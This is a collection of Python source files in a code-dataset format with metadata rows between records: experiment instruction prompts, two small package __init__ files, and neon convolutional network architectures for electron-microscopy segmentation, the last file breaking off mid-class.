topPrompts = ["You will now be asked a few questions about the text you just read. Answer using the number keys.",
"There's no time limit on each question, but try to answer in a reasonable amount of time.",
"If you don't know the answer, take your best guess."]
elif promptType == 'TestBoth':
# declare prompts for questions on both reading and audio.
topPrompts = ["You will now be asked a few questions about the lectures you just read and heard. Answer using the number keys.",
"Some questions may be on material you were asked to ignore. Please try to answer anyway. If you don't know the answer, take your best guess.",
"There's no time limit on each question, but try to answer in a reasonable amount of time."]
elif promptType == 'TestSound':
# declare prompts for questions on audio.
topPrompts = ["You will now be asked a few questions about the lecture you just heard. Answer using the number keys.",
"Some questions may be on material you didn't hear or were asked to ignore. Please try to answer anyway. If you don't know the answer, take your best guess.",
"There's no time limit on each question, but try to answer in a reasonable amount of time."]
elif promptType == 'TestSound_box':
# declare prompts for questions on audio.
topPrompts = ["You will now be asked a few questions about the lecture you just heard. Answer using the button box.",
"Some questions may be on material you didn't hear or were asked to ignore. Please try to answer anyway. If you don't know the answer, take your best guess.",
"There's no time limit on each question, but try to answer in a reasonable amount of time."]
else:
raise Exception('Prompt Type %s not recognized!'%promptType)
# declare bottom prompts
bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
elif experiment.startswith('ColorVigilanceTask'):
if promptType == 'Default':
# declare default list of prompts
topPrompts = ["During this task, a %s dot will display in the middle of the screen. Look at the dot for the duration of the task. When the dot turns %s, press the %c key with your right index finger."%(params['dotColor'],params['targetColor'],params['respKey'].upper()),
"Just before and after each block of trials, a cross will appear. Look directly at the cross while it's on the screen."]
else:
raise Exception('Prompt Type %s not recognized!'%promptType)
# declare bottom prompts
bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
elif experiment.startswith('SingingTask'):
if promptType == 'Default':
# declare default list of prompts
topPrompts = ["During this task, you will be asked to perform scales, speak, or sing while keeping your head still.",
"Just before each exercise, a cross will appear. Look directly at the cross while it's on the screen.",
"Before each of these trials, you will see a brief countdown. Please start the scale/speech/song when it reaches 0.",
"Once you've started, use the change in numbers as your beat. Stop when the count is over and the cross reappears."]
elif promptType == 'CountImagineSing':
# declare default list of prompts
topPrompts = ["During this task, you will be asked to COUNT along with the beat, IMAGINE singing, or SING while keeping your head still.",
"Just before each exercise, a cross will appear. Look directly at the cross while it's on the screen.",
"Before each of these exercise, you will see a brief countdown. Please start the exercise when it reaches 0.",
"Once you've started, use the change in numbers as your beat. Stop when the count is over and the cross reappears."]
else:
raise Exception('Prompt Type %s not recognized!'%promptType)
# declare bottom prompts
bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
elif experiment.startswith('AuditorySequenceTask'):
if promptType == 'Default':
# declare default list of prompts
topPrompts = ["During this task, you will see a fixation cross that changes colors.Look directly at the cross while it's on the screen.",
"On each trial, you will feel two sequences of taps on your fingers. After the second sequence, the cross will turn yellow.",
"When the cross turns yellow, press %s if the two sequences were the same and %s if they were different."%(params['respKeys'][0],params['respKeys'][1]) ]
else:
raise Exception('Prompt Type %s not recognized!'%promptType)
# declare bottom prompts
bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
elif experiment.startswith('MultiTaskAvWithCheckerboard'):
if promptType == 'Default':
# declare default list of prompts
topPrompts = ["During this task, you will see a fixation cross, words, and checkerboard patterns. Look directly at the center of the screen during the whole run.",
"You will also hear sounds. A cue before each block will tell you whether you should respond to the sounds or the written words, and how you should respond.",
"Respond AS QUICKLY AS POSSIBLE to the words or sounds according to what the cue asks you to do."]
elif promptType == 'Long':
# declare default list of prompts
topPrompts = ["During this task, you will see a fixation cross, words, and checkerboard patterns. Keep your eyes open and look directly at the center of the screen during the whole run.",
"You will also hear sounds. A cue before each block will tell you whether you should respond to the sounds or the written words, and how you should respond.",
"'Visual: Button' indicates that you should press a button as soon as you see the fixation cross change into something else. Ignore the checkerboards and sounds.",
"'Visual: Add' indicates that you should mentally add all the numbers you see. Keep track in your head until the end of the block, when you will be asked for your count. Ignore the checkerboards and sounds and avoid moving.",
"'Audio: Button' indicates that you should press a button as soon as you hear speech. Ignore the checkerboards and text visuals.",
"'Audio: Add' indicates that you should mentally add all the numbers you hear. Keep track in your head until the end of the block, when you will be asked for your count. Ignore the checkerboards and text visuals and avoid moving.",
"'Rest' indicates that you should ignore all visual and auditory stimuli and think about other things during the block.",
"Respond AS QUICKLY AS POSSIBLE to the words or sounds according to what the cue asks you to do."]
else:
raise Exception('Prompt Type %s not recognized!'%promptType)
# declare bottom prompts
bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
elif experiment.startswith('MovieTask'):
if promptType == 'Test':
# declare default list of prompts
topPrompts = ["You are about to watch a movie. Keep your eyes open and try to absorb as much of the movie as you can.",
"When the movie is over, you'll be asked a few questions about it. Answer the questions using the number keys.",
"Just before and after the movie, a cross will appear. Look directly at the cross while it's on the screen."]
elif promptType == 'Watch':
topPrompts = ["You are about to watch a movie. Keep your eyes open and try to absorb as much of the movie as you can.",
"Just before and after the movie, a cross will appear. Look directly at the cross while it's on the screen."]
else:
raise Exception('Prompt Type %s not recognized!'%promptType)
# declare bottom prompts
bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
elif experiment.startswith('AuditorySpeedReadingTask'):
if promptType == 'Default':
# declare default list of prompts
topPrompts = ["In this run, you will hear a voice reading text. Try to absorb as much of the reading as you can.",
"When the reading is over, you'll be asked a few questions about it. Answer the questions using the button box.",
"Throughout the whole run, a cross will appear. Look directly at the cross while it's on the screen."]
else:
raise Exception('Prompt Type %s not recognized!'%promptType)
# declare bottom prompts
bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
elif experiment.startswith('VisualSpeedReadingTask'):
if promptType == 'Default':
# declare default list of prompts
topPrompts = ["In this run, you will see text flashed in front of you. Try to absorb as much of the reading as you can.",
"When the reading is over, you'll be asked a few questions about it. Answer the questions using the button box.",
"Between blocks of text, a cross will appear. Look directly at the cross while it's on the screen."]
else:
raise Exception('Prompt Type %s not recognized!'%promptType)
# declare bottom prompts
bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
else:
raise Exception('Experiment %s not recognized!'%experiment)
# return the prompts
return (topPrompts,bottomPrompts)
| 72.652597 | 282 | 0.632748 | 6,067 | 44,754 | 4.656502 | 0.093786 | 0.007256 | 0.009734 | 0.015044 | 0.822661 | 0.807617 | 0.797848 | 0.788928 | 0.776114 | 0.771548 | 0 | 0.006106 | 0.286455 | 44,754 | 615 | 283 | 72.770732 | 0.878562 | 0.201189 | 0 | 0.618938 | 0 | 0.279446 | 0.539811 | 0.005229 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013857 | false | 0 | 0.023095 | 0 | 0.050808 | 0.011547 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bb5d7001923cc4b6bce46b57e001f9c15b3613f0 | 123 | py | Python | syft/execution/__init__.py | stephenjfox/PySyft | a27deed0d07c199de039fafd323164640c9c8f6d | [
"Apache-2.0"
] | 2 | 2020-12-30T11:21:43.000Z | 2021-12-04T16:25:53.000Z | syft/execution/__init__.py | stephenjfox/PySyft | a27deed0d07c199de039fafd323164640c9c8f6d | [
"Apache-2.0"
] | 1 | 2020-04-07T13:36:44.000Z | 2020-04-07T13:36:44.000Z | syft/execution/__init__.py | JMBehnken/PySyft | 35012f5bf55628bb19761d5f40d03181fbbb1766 | [
"Apache-2.0"
] | 1 | 2021-12-31T09:27:55.000Z | 2021-12-31T09:27:55.000Z | from syft.execution.plan import func2plan
from syft.execution.plan import method2plan
from syft.execution.plan import Plan
| 30.75 | 43 | 0.853659 | 18 | 123 | 5.833333 | 0.388889 | 0.228571 | 0.485714 | 0.6 | 0.771429 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018018 | 0.097561 | 123 | 3 | 44 | 41 | 0.927928 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
2484d6bb327c7e0961097e174bc76f87df458c86 | 126 | py | Python | backend/app/db/base.py | ianahart/blog | fc52e15a8b56bd4c6482065de7e21f8b31f5d765 | [
"MIT"
] | null | null | null | backend/app/db/base.py | ianahart/blog | fc52e15a8b56bd4c6482065de7e21f8b31f5d765 | [
"MIT"
] | null | null | null | backend/app/db/base.py | ianahart/blog | fc52e15a8b56bd4c6482065de7e21f8b31f5d765 | [
"MIT"
] | null | null | null | from .base_class import Base
from app.models.user import User
from app.models.post import Post
from app.models.tag import Tag
| 25.2 | 32 | 0.81746 | 23 | 126 | 4.434783 | 0.391304 | 0.205882 | 0.382353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126984 | 126 | 4 | 33 | 31.5 | 0.927273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
2496f5530f56b3d194d9dc9e1f00a515e14ba0b1 | 25,008 | py | Python | neon3/arch/emarch.py | erjel/emdrp | 0b04a164989dd2f8ab8d1defc38353a6c0c11c8c | [
"MIT"
] | 4 | 2020-01-14T14:41:14.000Z | 2022-01-08T11:12:27.000Z | neon3/arch/emarch.py | erjel/emdrp | 0b04a164989dd2f8ab8d1defc38353a6c0c11c8c | [
"MIT"
] | 1 | 2021-09-23T19:59:08.000Z | 2021-09-23T19:59:08.000Z | neon3/arch/emarch.py | erjel/emdrp | 0b04a164989dd2f8ab8d1defc38353a6c0c11c8c | [
"MIT"
] | 1 | 2021-03-02T15:25:48.000Z | 2021-03-02T15:25:48.000Z | # The MIT License (MIT)
#
# Copyright (c) 2016 Paul Watkins, National Institutes of Health / NINDS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from neon.initializers import Constant, Gaussian, Uniform, Kaiming
from neon.layers import Conv, Dropout, Pooling, Affine, LRN #, Deconv
#from neon.layers import Activation, MergeSum, SkipNode, BatchNorm
from neon.transforms import Rectlin, Logistic, Softmax, Identity, Explin
from layers.emlayers import DOG
class EMModelArchitecture(object):
def __init__(self, noutputs, use_softmax):
self.noutputs = noutputs
self.use_softmax = use_softmax
@property
def layers(self):
raise NotImplementedError()
@staticmethod
def init_model_arch(name, noutputs, use_softmax):
# instantiate the model with class given by name string
return globals()[name](noutputs, use_softmax)
class fergus(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False):
super(fergus, self).__init__(noutputs, use_softmax)
@property
def layers(self):
return [
Conv((7, 7, 96), init=Gaussian(scale=0.0001), bias=Constant(0), activation=Rectlin(),
padding=3, strides=1),
LRN(31, ascale=0.001, bpower=0.75),
Pooling(3, strides=2, padding=1),
Conv((5, 5, 256), init=Gaussian(scale=0.01), bias=Constant(0), activation=Rectlin(),
padding=2, strides=1),
LRN(31, ascale=0.001, bpower=0.75),
Pooling(3, strides=2, padding=1),
Conv((3, 3, 384), init=Gaussian(scale=0.01), bias=Constant(0), activation=Rectlin(),
padding=1, strides=1),
Conv((3, 3, 384), init=Gaussian(scale=0.01), bias=Constant(0), activation=Rectlin(),
padding=1, strides=1),
Conv((3, 3, 256), init=Gaussian(scale=0.01), bias=Constant(0), activation=Rectlin(),
padding=1, strides=1),
Pooling(3, strides=2, padding=1),
Affine(nout=4096, init=Gaussian(scale=0.01), bias=Constant(0), activation=Identity()),
Dropout(keep=0.5),
Affine(nout=4096, init=Gaussian(scale=0.01), bias=Constant(0), activation=Identity()),
Dropout(keep=0.5),
Affine(nout=self.noutputs, init=Gaussian(scale=0.01), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
class nfergus(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False, bn_first_layer=False):
super(nfergus, self).__init__(noutputs, use_softmax)
self.bn_first_layer = bn_first_layer
@property
def layers(self):
bn = True
return [
Conv((7, 7, 96), init=Kaiming(), activation=Explin(), batch_norm=bn,
padding=3, strides=1)\
if self.bn_first_layer else\
Conv((7, 7, 96), init=Kaiming(), bias=Constant(0), activation=Explin(),
padding=3, strides=1),
Pooling(3, strides=2, padding=1),
Conv((5, 5, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=2, strides=1),
Pooling(3, strides=2, padding=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
#Pooling(3, strides=2, padding=1, op='avg'),
Pooling(3, strides=2, padding=1),
Affine(nout=self.noutputs, init=Kaiming(), activation=Explin(), batch_norm=bn),
Affine(nout=self.noutputs, init=Kaiming(), activation=Explin(), batch_norm=bn),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
class nbfergus(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False, bn_first_layer=False):
super(nbfergus, self).__init__(noutputs, use_softmax)
self.bn_first_layer = bn_first_layer
@property
def layers(self):
bn = True
return [
Conv((7, 7, 96), init=Kaiming(), activation=Explin(), batch_norm=bn,
padding=3, strides=1)\
if self.bn_first_layer else\
Conv((7, 7, 96), init=Kaiming(), bias=Constant(0), activation=Explin(),
padding=3, strides=1),
Pooling(3, strides=2, padding=1),
Conv((5, 5, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=2, strides=1),
Pooling(3, strides=2, padding=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
Affine(nout=4096, init=Kaiming(), activation=Explin(), batch_norm=bn),
Dropout(keep=0.5),
Affine(nout=4096, init=Kaiming(), activation=Explin(), batch_norm=bn),
Dropout(keep=0.5),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
# 980 train: 9.1 s / batch, 980 test: 3 s / batch
# overall best architecture found for huge ECS, use 128in 3class 32 out
class mfergus(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False, bn_first_layer=False):
super(mfergus, self).__init__(noutputs, use_softmax)
self.bn_first_layer = bn_first_layer
@property
def layers(self):
bn = True
return [
Conv((7, 7, 96), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=3, strides=1)\
if self.bn_first_layer else\
Conv((7, 7, 96), init=Kaiming(), bias=Constant(0), activation=Explin(), padding=3, strides=1),
Pooling(3, strides=2, padding=1),
Conv((7, 7, 128), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=3, strides=1),
Pooling(3, strides=2, padding=1),
Conv((5, 5, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=2, strides=1),
Pooling(3, strides=2, padding=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1, op='avg'),
Affine(nout=self.noutputs, init=Kaiming(), activation=Explin(), batch_norm=bn),
Affine(nout=self.noutputs, init=Kaiming(), activation=Explin(), batch_norm=bn),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
# these are mostly meant as a convolution speed test cases.
class bigcfergus(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False, bn_first_layer=False):
super(bigcfergus, self).__init__(noutputs, use_softmax)
self.bn_first_layer = bn_first_layer
@property
def layers(self):
bn = True
return [
Conv((9, 9, 96), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=4, strides=1)\
if self.bn_first_layer else\
Conv((9, 9, 96), init=Kaiming(), bias=Constant(0), activation=Explin(), padding=4, strides=1),
Pooling(3, strides=2, padding=1),
Conv((9, 9, 128), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=4, strides=1),
Pooling(3, strides=2, padding=1),
Conv((7, 7, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=3, strides=1),
Pooling(3, strides=2, padding=1),
Conv((5, 5, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=2, strides=1),
Conv((5, 5, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=2, strides=1),
Conv((5, 5, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=2, strides=1),
Pooling(3, strides=2, padding=1, op='avg'),
Affine(nout=self.noutputs, init=Kaiming(), activation=Explin(), batch_norm=bn),
Affine(nout=self.noutputs, init=Kaiming(), activation=Explin(), batch_norm=bn),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
class bigsfergus(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False, bn_first_layer=False):
super(bigsfergus, self).__init__(noutputs, use_softmax)
self.bn_first_layer = bn_first_layer
@property
def layers(self):
bn = True
return [
Conv((7, 7, 96), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=3, strides=1)\
if self.bn_first_layer else\
Conv((7, 7, 96), init=Kaiming(), bias=Constant(0), activation=Explin(), padding=3, strides=1),
Pooling(3, strides=2, padding=1),
Conv((7, 7, 192), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=3, strides=1),
Pooling(3, strides=2, padding=1),
Conv((5, 5, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=2, strides=1),
Pooling(3, strides=2, padding=1),
Conv((3, 3, 768), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 768), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 768), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1, op='avg'),
Affine(nout=self.noutputs, init=Kaiming(), activation=Explin(), batch_norm=bn),
Affine(nout=self.noutputs, init=Kaiming(), activation=Explin(), batch_norm=bn),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
# 980 train: 4.3 s / batch, 980 test: 1.5 s / batch
class h3vgg(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False):
super(h3vgg, self).__init__(noutputs, use_softmax)
@property
def layers(self):
bn = True
return [
# input 128
Conv((7, 7, 80), init=Kaiming(), bias=Constant(0), activation=Explin(), padding=3, strides=1),
Pooling(3, strides=2, padding=1),
# 64
Conv((3, 3, 96), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 96), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 32
Conv((3, 3, 192), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 192), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 16
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1, op='avg'),
# 8
Affine(nout=self.noutputs, init=Kaiming(), activation=Explin(), batch_norm=bn),
Affine(nout=self.noutputs, init=Kaiming(), activation=Explin(), batch_norm=bn),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
# winner for huge ECS of the 3x3 kernel archs for 64x64, use 128 in 3class 64 out
class vgg3pool(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False):
super(vgg3pool, self).__init__(noutputs, use_softmax)
@property
def layers(self):
bn = True
return [
# input 128
Conv((7, 7, 64), init=Kaiming(), bias=Constant(0), activation=Explin(), padding=3, strides=1),
Pooling(3, strides=2, padding=1),
# 64
Conv((3, 3, 96), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 96), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 32
Conv((3, 3, 192), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 192), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 16
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
# this 4th deep layer may have been in for vgg3pool64all run? can not fit for 6fold so commented
#Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 8
#Conv((3, 3, 6144), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 12288), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling('all', op='avg'),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
# 980 train: xxx s / batch, 980 test: 0.65 s / batch
class vgg4pool(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False):
super(vgg4pool, self).__init__(noutputs, use_softmax)
@property
def layers(self):
bn = True
return [
# input 128
Conv((7, 7, 64), init=Kaiming(), bias=Constant(0), activation=Explin(), padding=3, strides=1),
Pooling(3, strides=2, padding=1),
# 64
Conv((3, 3, 64), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 64), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 32
Conv((3, 3, 128), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 128), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 16
Conv((3, 3, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 8
Conv((3, 3, 9216), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling('all', op='avg'),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
class vgg5pool(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False):
super(vgg5pool, self).__init__(noutputs, use_softmax)
@property
def layers(self):
bn = True
return [
# input 128
Conv((7, 7, 64), init=Kaiming(), bias=Constant(0), activation=Explin(), padding=3, strides=1),
Pooling(3, strides=2, padding=1),
# 64
Conv((3, 3, 96), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 96), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 32
Conv((3, 3, 192), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 192), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 16
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 8
Conv((3, 3, 8192), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling('all', op='avg'),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
# 980 train: xxx s / batch, 980 test: 0.95 s / batch
# second-up for huge ECS using normal kernel archs for 64x64, use 128 in 3class 64 out
# same architecture as mfergus except uses global pooling instaed of fully connected layers
class pfergus(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False, bn_first_layer=False):
super(pfergus, self).__init__(noutputs, use_softmax)
@property
def layers(self):
bn = True
return [
# input 128
Conv((7, 7, 96), init=Kaiming(), bias=Constant(0), activation=Explin(), padding=3, strides=1),
Pooling(3, strides=2, padding=1),
# 64
Conv((7, 7, 128), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=3, strides=1),
Pooling(3, strides=2, padding=1),
# 32
Conv((5, 5, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=2, strides=1),
Pooling(3, strides=2, padding=1),
# 16
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 8
Conv((3, 3, 6144), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling('all', op='avg'),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
class p2fergus(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False, bn_first_layer=False):
super(p2fergus, self).__init__(noutputs, use_softmax)
@property
def layers(self):
bn = True
return [
# input 128
Conv((7, 7, 64), init=Kaiming(), bias=Constant(0), activation=Explin(), padding=3, strides=1),
Pooling(3, strides=2, padding=1),
# 64
Conv((7, 7, 128), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=3, strides=1),
Pooling(3, strides=2, padding=1),
# 32
Conv((5, 5, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=2, strides=1),
Pooling(3, strides=2, padding=1),
# 16
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 8
Conv((3, 3, 10240), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling('all', op='avg'),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
class p3fergus(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False, bn_first_layer=False):
super(p3fergus, self).__init__(noutputs, use_softmax)
@property
def layers(self):
bn = True
return [
# input 128
